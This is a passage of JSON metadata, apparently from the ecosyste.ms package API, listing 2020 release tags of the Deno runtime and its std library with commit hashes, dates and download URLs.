s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%